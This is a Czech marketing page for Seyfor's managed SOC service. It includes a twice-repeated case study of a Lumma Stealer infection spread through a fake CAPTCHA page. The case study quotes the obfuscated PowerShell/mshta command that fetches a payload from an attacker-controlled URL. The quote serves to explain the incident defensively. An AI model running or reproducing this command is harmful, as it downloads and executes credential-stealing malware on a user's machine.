MENU Zavřít

Security Operations Center

Služba SOC od společnosti Seyfor zajistí nepřetržitou ochranu vašeho IT prostředí 24/7 za zlomek nákladů na interní tým.

Klíčové výhody využití SOC

Monitorování 24/7

Monitorování 24/7

Detekce, prevencereakce na bezpečnostní incidenty v reálném čase.

Compliance a regulace

Compliance a regulace

SOC přispívá k dodržení standardů jako NIS2, ZoKB a dalších.

Automatizace a AI

Automatizace a AI

Pokročilé technologie pomáhají analyzovateliminovat hrozby efektivněji.

Úspora nákladů

Úspora nákladů

Výstavba interního SOC je extrémně drahá, outsourcing je finančně efektivnější.

Jak Seyfor SOC služba funguje?

Detekce a monitoring

Detekce a monitoring

Neustále sledujeme a analyzujeme síťový provoz i systémová data, abychom odhalili podezřelé aktivity. Díky pokročilým algoritmům a strojovému učení identifikujeme hrozby ještě předtím, než mohou způsobit škody. Předejdeme tak nejen kybernetickým útokům, ale i provozním výpadkům.

Investigace incidentů

Investigace incidentů

Každý podezřelý incident podrobně analyzujeme prostřednictvím pokročilých forenzních metod a technik threat huntingu. Naši experti posuzují závažnost hrozebodhalují jejich zdroj i rozsah dopadu. Díky rychlé identifikaci hrozeb minimalizujeme riziko narušení provozu.

Rychlá reakce a eliminace

Rychlá reakce a eliminace

Při detekci hrozby okamžitě nasazujeme opatření k jejímu omezení a eliminaci. Patří sem například reset kompromitovaných přístupových údajů, izolace napadených zařízení nebo blokace škodlivých IP adres. Cílem je zastavit útok dříve, než způsobí reálné škody.

Průřezové reporty a doporučení

Průřezové reporty a doporučení

Pravidelně vyhodnocujeme bezpečnostní situaci a poskytujeme detailní přehled o identifikovaných rizicích. Na základě získaných dat navrhujeme konkrétní kroky pro zlepšení bezpečnostních opatření. Díky tomu mohou firmy efektivně předcházet budoucím hrozbám a neustále zvyšovat svou kybernetickou odolnost.

Obrázek

Kyberhrozby, které SOC eliminuje:

  • Phishing a krádež přihlašovacích údajů
  • Ransomware útoky a vydírání
  • Pokusy o průnik do systémů
  • Zneužití oprávnění a anomální aktivity
  • Phishing a krádež přihlašovacích údajů
  • Ransomware útoky a vydírání
  • Pokusy o průnik do systémů
  • Zneužití oprávnění a anomální aktivity

SOC v praxi:
Jak jsme zastavili malware
útok za 12 minut 

Lumma Stealer je malware šířený prostřednictvím falešných CAPTCHA stránek, malvertisingu a cracknutého softwaru. Nejnovější kampaň, odhalená Netskope Threat Labs v lednu 2025, cílí na uživatele Windows po celém světě, zejména v telekomunikačním sektoru. 

Infekční řetězec obchází bezpečnostní mechanismy tím, že oběť instruuje ke spuštění škodlivého kódu manuálně pomocí klávesových zkratek. Malware využívá LOLBIN techniky (např. mshta.exe) k obcházení detekce a injektování škodlivého kódu do legitimních procesů, čímž útočníci eliminují podezření.  

A právě s tímto typem útoku jsme se nedávno setkali. Scénář byl následující:

Zaměstnanec, který měl na svém běžném pracovním účtu oprávnění lokálního administrátora, půjčil počítač synovi, který pak podle instrukcí z navštívené webové stránky stiskl Win+R a vložil „captcha“ text. Ve skutečnosti šlo o PowerShell skript:  
POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\S*2\\\\\\\m*ht*e https://hur.bweqlkjr.shop/m41.mp4  

 

Experti ze SOC týmu zareagovali okamžitě – počítač byl izolován již 12 minut od incidentu. 

Lumma Stealer je malware šířený prostřednictvím falešných CAPTCHA stránek, malvertisingu a cracknutého softwaru. Nejnovější kampaň, odhalená Netskope Threat Labs v lednu 2025, cílí na uživatele Windows po celém světě, zejména v telekomunikačním sektoru. 

Infekční řetězec obchází bezpečnostní mechanismy tím, že oběť instruuje ke spuštění škodlivého kódu manuálně pomocí klávesových zkratek. Malware využívá LOLBIN techniky (např. mshta.exe) k obcházení detekce a injektování škodlivého kódu do legitimních procesů, čímž útočníci eliminují podezření.  

A právě s tímto typem útoku jsme se nedávno setkali. Scénář byl následující:

Zaměstnanec, který měl na svém běžném pracovním účtu oprávnění lokálního administrátora, půjčil počítač synovi, který pak podle instrukcí z navštívené webové stránky stiskl Win+R a vložil „captcha“ text. Ve skutečnosti šlo o PowerShell skript:  
POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\S*2\\\\\\\m*ht*e https://hur.bweqlkjr.shop/m41.mp4  

 

Experti ze SOC týmu zareagovali okamžitě – počítač byl izolován již 12 minut od incidentu. 

Poznejte službu SOC ještě dnes

Požádejte o nezávaznou konzultaci našeho experta na kyberbezpečnost a zjistěte, jak SOC služba posílí bezpečnost vaší organizace. 

Vyplňte formulář a získejte cenovou nabídku pro vaši firmu.

Dan Albrecht

Manager of Cyber Security Technologies

Seyfor, a.s.
Cloud and Security Competence Center


Na Strži 2097/63
140 00 Praha 4
Česká republika 

IČO 01572377
DIČ CZ01572377

Nechte nám na sebe kontakt a my se vám ozveme zpět

Vaše osobní údaje budou zpracované pro účely obchodní komunikace na základě oprávněného zájmu podle čl. 6 ods. 1 písm. f) všeobecného nařízení o ochraně osobních údajů (GDPR).
Více informací o ochraně osobních údajů a vašich právech najdete zde.